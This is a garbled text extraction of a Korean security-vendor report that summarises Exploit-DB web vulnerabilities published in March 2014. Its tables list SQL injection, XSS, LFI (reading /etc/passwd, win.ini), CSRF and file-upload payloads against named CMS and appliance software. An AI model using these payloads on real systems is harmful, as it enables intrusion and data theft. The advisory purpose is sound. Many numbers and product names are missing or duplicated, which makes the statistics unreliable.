EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

PowerPoint Template

3장


구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

SK Telecom Platform NATE

105È£4fš

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

HTML5

쉽게 풀어쓴 C 프로그래밍

PHP & ASP

Ç¥Áö

PowerPoint 프레젠테이션

C H A P T E R 2

Secure Programming Lecture1 : Introduction

PHP & ASP

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

PowerPoint Presentation

쉽게 풀어쓴 C 프로그래밍

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

하둡을이용한파일분산시스템 보안관리체제구현

Javascript

PowerPoint 프레젠테이션

Dialog Box 실행파일을 Web에 포함시키는 방법

³»Áö¼öÁ¤

제목 레이아웃

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

MAX+plus II Getting Started - 무작정따라하기

쉽게 풀어쓴 C 프로그래밍

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

Interstage5 SOAP서비스 설정 가이드

1

untitled

untitled

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

Microsoft PowerPoint Python-WebDB

초보자를 위한 C++

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

쉽게 풀어쓴 C 프로그래밍

Javascript.pages

3ÆÄÆ®-14

0. 들어가기 전

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

Building Mobile AR Web Applications in HTML5 - Google IO 2012

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

歯이시홍).PDF

CMS-내지(서진이)

The Self-Managing Database : Automatic Health Monitoring and Alerting

BEef 사용법.pages

웃음 지기 이기준 2014년 봄호 10 년간의 사랑 이야기 마리루시 수녀 그리스도의 교육수녀회 관구장 여 는 글 Contents 여는글 I 10년간의 사랑 이야기 1 아동학대 현황보고 2 사업 I 교육 사업 3 홍보 사업 5 자원발 사업 5 그룹홈 6 햇살가득그룹홈 이

2파트-07

Observational Determinism for Concurrent Program Security

PowerPoint 프레젠테이션

LXR 설치 및 사용법.doc

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

웹 개발자를 위한 서블릿/JSP

Portal_9iAS.ppt [읽기 전용]

PowerPoint プレゼンテーション

Microsoft Word - junior.docx

Orcad Capture 9.x

2009년 상반기 사업계획

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

PowerPoint Presentation

PCServerMgmt7

untitled

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

INDEX 들어가기 고민하기 HTML(TABLE/FORM) CSS JS

1217 WebTrafMon II

untitled

Analyst Briefing

미쓰리 파워포인트

Inside Android Applications

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

!K_InDesginCS_NFH

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

초보자를 위한 ASP.NET 21일 완성

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

歯Phone

Microsoft PowerPoint - Smart CRM v4.0_TM 소개_ pptx

Transcription:

EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은 SQL Injection 의공격난이도가 [ 하 ] 로분류되어있으면서위험도가 [ 상 ] 인공격이다수존재하는부분입니다. 쉽게시도가능한공격임에도불구하고고객의웹환경에비교적큰피해를입힐수있어각별한주의및적절한대응마련이필요합니다. 이외 SQL Injection중난이도가높은공격코드에서일반적인패턴이아닌공격코드가발견되어해당이통하는웹환경의관리자역시각별한주의가필요할것으로판단됩니다. 또, 지난달 위를기록했던 XSS 공격에대한역시비교적많은개수가보고되었습니다. XSS 의경우공격난이도가 [ 하 ] 이면서공격위험도가 [ 중 ] 으로분류되는이다수로, 지난달에이어이번달에도 XSS 공격에대해서는지속적으로주의가필요합니다. 주요소프트웨어별분석결과, 에서가장많은수의이보고되었으며, 보고된모두이번달특히주의가필요한 SQL Injection과 XSS 관련이었습니다. 사용고객은, 보고된에대한대응이가능한최신버전으로의업데이트를진행하여해당에대해서대응할수있도록해야하겠습니다.. 별보고개수 보고개수 SQL Injection XSS 8 LFI 6 File Upload Directory Traversal CSRF 총합계 9 4 0 8 6 4 0 8 별보고개수 6 SQL Injection XSS LFI File Upload Directory Traversal CSRF. 위험도별분류위험도 보고개수 백분율 상 38% 중 8 6% 하 0 0% 합계 9 00% 8 위험도별분류 상 중 3. 공격난이도별현황공격난이도 보고개수 백분율 상 4 4% 중 7% 하 3 79% 합계 9 00% 공격난이도별현황 4 상 중 하 3 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 5 주요소프트웨어별발생현황 3 ell SonicWall Applicatio Ilch 5 Ilch Church Edit McAfee Asset Manager 3 Procentia IntelliPen Kemana Directory LuxCal Church Edit Trixbox SpagoBI McAfee Asset Manager Synology 총합계 9

EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Injection 하 상 CMS.0 - comments_paginate.php SQL Injection 3037 SQL Injection 하 중 CMS.0 - stores_paginate.php SQL Injection 3037 XSS 하 중 CMS.0 - comments_paginate.php XSS 3037 XSS 하 중 CMS.0 - stores_paginate.php XSS 3037 XSS 하 중 CMS.0 - index.php XSS

EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) --------7dd009908f -----------------------------7dd009908f 04-03-03 3040 File Upload 하상 SpagoBI 4.0 - Worksheet designer function File Upload filename="xss.html" Content-Type: application/octet-stream SpagoBI SpagoBI 4.0 <!DOCTYPE html> <html> <head> <script> function myfunction() {alert("xss");} </script> </head> <body> <input type="button" onclick="myfunction()" value="show alert 04-03-03 3037 SQL Injection 하 상 04-03-03 3037 SQL Injection 하 중 04-03-03 3037 XSS 하 중 04-03-03 3037 XSS 하 중 04-03-03 3037 XSS 하 중 CMS.0 - comments_paginate.php SQL Injection CMS.0 - stores_paginate.php SQL Injection CMS.0 - comments_paginate.php XSS CMS.0 - stores_paginate.php XSS CMS.0 - index.php XSS box"> /admin/ajax/comments_paginate.php?secho=&icolumns=7&sc olumns=&idisplaystart=0%0and%0=&idisplaylength=50 %0and%0= /admin/ajax/stores_paginate.php?secho=&icolumns=&scolu mns=&idisplaystart=0%0and%0=&idisplaylength=50%0 and%0= /admin/ajax/comments_paginate.php?secho="><script>alert(); </script> /admin/ajax/stores_paginate.php?secho="><script>alert();</sc ript> POST /admin/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 CMS.0 CMS.0 CMS.0 CMS.0 CMS.0 POST /index.php/guestbook/index/newentry HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 04-03-05 3076 XSS 하중 Ilch CMS.0 - newentry XSS 취약 점 Ilch Ilch CMS.0 ilch_token=5a58778359d4756b9b8803b48fba8b&name=name &email=email%40email.com&homepage=http%3a%f%fsite.c 04-03-05 3075 SQL Injection 중상 04-03-07 35 Directory Traversal 하중 04-03- 33 LFI 하상..7 - ajax_udf.php SQL Injection Ajax File Manager Directory Traversal - ajax_get_file_listing.php Directory Traversal 5.4.0, 6.0 RC, 6.0.0 GA - browse.php LFI om&text=<script>alert('immuniwweb');</script>&saveentry=su /ajax_udf.php?q=&add_value=odm_user%0union%0select %0,version%8%9,3,4,5,6,7,8,9 /ajaxfilemanager/ajax_get_file_listing.php?limit=0&view=thumb nail&search=&search_name=&search_recursively=0&search_mt ime_from=&search_mtime_to=&search_folder=../../../../../../../../ho me/phungv93/public_html/ POST /vtigercrm6rc/kcfinder/browse.php?type=files&lng=en&act=do wnload HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75..7 5.4.0, 6.0 RC, 6.0.0 GA 04-03- 3 SQL Injection 하상 04-03- 3 SQL Injection 하상 Procentia IntelliPen...50 - Data.aspx SQL Injection LuxCal 3.. - rssfeed.php SQL Injection /Resources/System/Templates/Data.aspx?DocID=&field=JobID &value=%0and%0=&jobid=&parentdocid=694&intab =&ParentKey=JobNumber&NoStore=&Popup= /lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%7%b(s elect(0)from(select(sleep(0)))v)%b%7%%b(select(0)from(sele ct(sleep(0)))v)%b%*/ Procentia Procentia IntelliPen IntelliPen...50 LuxCal LuxCal 3..

EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 POST /gnupanelreseller.php?seccion=tickets&plugin=enviar_ticket HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 --------75774448707775088537 -----------------------------75774448707775088537 Content-Disposition: form-data; name=""keyword"" 04-03- 307 CSRF 하중 04-03-3 339 SQL Injection 중상 04-03-4 374 SQL Injection 하중 0.3.5_R4 - gnupanelreseller.php CSRF Trixbox All Versions - conf_cdr.php SQL Injection Synology DSM 4.3-387 - article.php SQL Injection <form id="baba" method="post" action="http://demo/gnupanelreseller.php?seccion=tickets&plugin=enviar_ticket"> <input name="asunto" size="45" value="demo" maxlength="54"> <textarea name="consultar" rows="0" cols="50"><script>alert("xss");</script></textarea> <input name="ingresando" value="" type="hidden"> <input name="resetea" value="reset" type="reset"> <input name="agrega" value="send" type="submit"> </form> <script type="text/javascript">document.getelementbyid("baba").submit /web-meetme/conf_cdr.php?bookid=' RLIKE (SELECT (CASE WHEN (97=97) THEN ELSE 0x8 END)) AND 'AIdK'='AIdK POST /photo/include/blog/article.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 Trixbox Synology 0.3.5_R4 Trixbox All Versions Synology DSM 4.3-387 04-03-5 38 SQL Injection 하 중 04-03-7 330 SQL Injection 상 상 04-03-7 330 SQL Injection 상 상 04-03-7 330 SQL Injection 상 상 04-03-9 3368 LFI 하 중 04-03-0 3375 XSS 하 중 04-03-5 35 LFI 하 중 04-03-5 3508 LFI 하 중 04-03-5 3504 LFI 하 중 04-03-5 350 XSS 하 중 Church Edit - gallery.php SQL Injection.0 - login.php SQL Injection.0 - responder.php SQL Injection.0 - verarticulo.php SQL Injection McAfee Asset Manager 6.6 - downloadreport LFI < 4.7./5.0. + < 4.8.4/5..4 - sample-name.html XSS CMS 6.0.0 - task.php LFI Kemana Directory.5.6 - task.php LFI 3.0.0 - task.php LFI 3.3. - settings.php XSS list_type=label&value=%0and%03**%3d6%0and%08 /photos/gallery.php?gallery_id=%0and%0=&pg= Church Edit Church Edit /login.php?emailcorreoelectronico=(select(0)from(select(sleep(0)) )v)/*'%b(select(0)from(select(sleep(0)))v)%b'%%b(select(0)fr om(select(sleep(0)))v)%b%*/&pass=g00dpa%4%4w0rd&su bmit=login /responder.php?idarticulo=&name=&staff=no&submit=send&t ext_content=if(now()%3dsysdate()%csleep(0)%c0)/*'xor(if(now ()%3dsysdate()%csleep(0)%c0))OR'%XOR(if(now()%3dsysdate ()%csleep(0)%c0))or%*/ /support/verarticulo.php?id=if(now()%3dsysdate()%csleep(0)% c0)/*'xor(if(now()%3dsysdate()%csleep(0)%c0))or'%xor(if( now()%3dsysdate()%csleep(0)%c0))or%*/ /servlet/downloadreport?reportfilename=../../../../../../../../etc/pas McAfee Asset swd&format=csv /tag/sample/samplename.html?cur=&listtype=tag&pgnr=&searchtag=<script>ale rt()</script> /qe6_0/admin/task.php?run=../../../../../../windows/win.ini /kemana/admin/task.php?run=../../../../../../windows/win.ini /ce3_0/admin/task.php?run=../../../../../../windows/win.ini POST /admin/settings.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 Manager Kemana Directory.0.0.0 McAfee Asset Manager 6.6 < 4.7./5.0. + < 4.8.4/5..4 CMS 6.0.0 Kemana Directory.5.6 3.0.0 3.3. 04-03-6 3546 LFI 하중 04-03-6 356 SQL Injection 상상 8.8 - download.php LFI 5.0.3 build 574 - xhr.php SQL Injection /download.php?log=../../etc/passwd POST /xhr.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 i={"r":"controller","i":{"pgn8state":{"l":0,"o":0,"or":"(case+when +(substring(@@version,,)='m')+then+nu.email+else+nu.nick name+end)","d":"asc"},"refresh_on":[["addcommit",null],["editco mmit",null],["deletecommit",null],["activatecommit",null],["deactiv atecommit",null]],"iw_refresh_action":"listusers","iw_refresh_ctrl":" Ctrl_Nodeworx_Users","security_token":"- ensv4z4pdyomp3pg8lrvswrthye","c":"index","a":"livepayloadco 8.8 5.0.3 build 574

EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /settings_advanced.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 04-03-7 3556 XSS 하 중 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 - settings_advanced XSS --------75774448707775088537 -----------------------------75774448707775088537 Content-Disposition: form-data; name="snmpcomstr" 04-03-7 3556 XSS 하중 - settings_upload_dlicense.html XSS snwl>>"%0<script>alert()</script>.jpg POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) --------7dd009908f -----------------------------7dd009908f filename="%0<script>alert()</script>.jpg" Content-Type: image/jpeg POST /xhr.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 04-03-6 356 SQL Injection 상상 04-03-7 3556 XSS 하중 5.0.3 build 574 - xhr.php SQL Injection - settings_advanced XSS i={"r":"controller","i":{"pgn8state":{"l":0,"o":0,"or":"(case+when +(substring(@@version,,)='m')+then+nu.email+else+nu.nick name+end)","d":"asc"},"refresh_on":[["addcommit",null],["editco mmit",null],["deletecommit",null],["activatecommit",null],["deactiv atecommit",null]],"iw_refresh_action":"listusers","iw_refresh_ctrl":" Ctrl_Nodeworx_Users","security_token":"- ensv4z4pdyomp3pg8lrvswrthye","c":"index","a":"livepayloadco POST /settings_advanced.html HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 --------75774448707775088537 -----------------------------75774448707775088537 Content-Disposition: form-data; name="snmpcomstr" 5.0.3 build 574 snwl>>"%0<script>alert()</script>.jpg POST /test.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 04-03-7 3556 XSS 하중 - settings_upload_dlicense.html XSS 6.; WOW64; Trident/6.0) --------7dd009908f -----------------------------7dd009908f filename="%0<script>alert()</script>.jpg" Content-Type: image/jpeg